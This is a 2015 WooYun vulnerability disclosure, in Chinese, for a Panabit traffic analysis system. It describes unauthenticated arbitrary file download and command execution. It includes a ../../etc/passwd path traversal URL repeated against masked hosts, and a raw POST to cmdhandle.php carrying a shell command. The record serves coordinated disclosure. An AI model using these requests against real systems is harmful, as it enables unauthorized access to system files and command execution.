漏洞概要
缺陷编号:
WooYun-2015-136721
漏洞标题: Panabit某流量分析管理系统存在设计缺陷(无需登录可任意命令执行&文件下载)
相关厂商:
北京派网软件有限公司
漏洞作者:
YY-2012
提交时间: 2015-08-25 08:45
公开时间: 2015-11-28 01:39
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org
Tags标签: 无
漏洞详情披露状态:
2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经确认,细节仅向厂商公开
2015-09-02: 细节向第三方安全合作伙伴开放
简要描述:
rt
漏洞hash:ad52dddf9e0098fc2f28738230f562d2版权声明:转载请注明来源
YY-2012@
乌云
详细说明:
全局可越权导致。
任意文件遍历:
code 区域http://地址/download.php?filename=../../../../etc/passwd
任意命令执行:
code 区域POST /Maintain/cmdhandle.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 地址
Content-Length: 11
Pragma: no-cache
cmd=ls -all
漏洞证明:
code 区域**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**:8080/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
修复方案:
联系厂商
版权声明:转载请注明来源
YY-2012@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-08-30 01:39
厂商回复:CNVD确认并复现所述情况,由CNVD尝试通过软件生产厂商公开联系渠道向其通报,由其后续提供解决方案 .
最新状态:暂无
原文:http://www.wooyun.org/bugs/wooyun-2010-0136721